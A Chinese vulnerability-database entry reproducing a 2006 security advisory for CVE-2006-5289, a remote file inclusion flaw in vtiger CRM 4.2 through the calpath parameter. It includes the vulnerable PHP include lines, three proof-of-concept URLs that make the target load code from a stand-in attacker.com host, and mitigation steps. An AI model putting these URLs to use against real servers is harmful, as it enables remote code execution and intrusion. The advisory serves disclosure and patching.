VTiger CRM多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111232 漏洞类型 输入验证
发布时间 2006-10-10 更新时间 2006-10-16
CVE编号 CVE-2006-5289 CNNVD-ID CNNVD-200610-203
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2508
https://cxsecurity.com/issue/WLB-2006100086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-203
|漏洞详情
VtigerCRM4.2及之前版本存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)modules/Calendar/admin/update.php,(2)modules/Calendar/admin/scheme.php或(3)modules/Calendar/calendar.php的calpath参数当中的URL,执行任意PHP代码。
|漏洞EXP
____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \
 |    __)_ /    \  \//    ~    \/   |   \
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/                              .OR.ID
ECHO_ADV_54$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_54$2006]vtiger CRM  <=4.2 (calpath) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author		: Dedi Dwianto a.k.a the_day
Date Found	: October, 09th 2006
Location	: Indonesia, Jakarta
web		: http://advisories.echo.or.id/adv/adv54-theday-2006.txt
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: Vtiger CRM
version		: <=4.2
URL		: http://vtiger.com

vtiger CRM is 100% Open Source Customer Relationship Management solution built over
LAMP/WAMP stack and other third-party open source packages.
vtiger CRM software can be installed in Windows NT/2000/XP/2003 and different types 
Unix/Linux-based distributions, such as RedHat 7.2/8.0/9.0, Debian 3.0, SuSe 9.0, Fedora Core 3.0, 
Mandrake 10.0, Mac OS, and FreeBSD.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder modules/Calendar/admin/ I found vulnerability script update.php
--------------------------update.php---------------------------------------
....
<?

  include_once $calpath .'webelements.p3';
  include_once $calpath .'permission.p3';
...
----------------------------------------------------------

Input passed to the "$calpath" parameter in update.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

modules/Calendar/admin/update.php
modules/Calendar/admin/scheme.php
modules/Calendar/calendar.php


Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[vtiger_crm_path]/modules/Calendar/admin/update.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/scheme.php?calpath=http://attacker.com/inject.txt?
http://target.com/[vtiger_crm_path]/modules/Calendar/calendar.php?calpath=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Upgrade to Vtiger CRM 5.0
- Sanitize variable $calpath on affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
     EcHo Research & Development Center
     the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-10]
|参考资料

来源:XF
名称:vtiger-update-file-include(29416)
链接:http://xforce.iss.net/xforce/xfdb/29416
来源:BID
名称:20435
链接:http://www.securityfocus.com/bid/20435
来源:BUGTRAQ
名称:20061009[ECHO_ADV_54$2006]vtigerCRM<=4.2(calpath)MultipleRemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448092/100/0/threaded
来源:MILW0RM
名称:2508
链接:http://www.milw0rm.com/exploits/2508
来源:MISC
链接:http://advisories.echo.or.id/adv/adv54-theday-2006.txt
来源:SREASON
名称:1722
链接:http://securityreason.com/securityalert/1722
来源:MILW0RM
名称:2508
链接:http://milw0rm.com/exploits/2508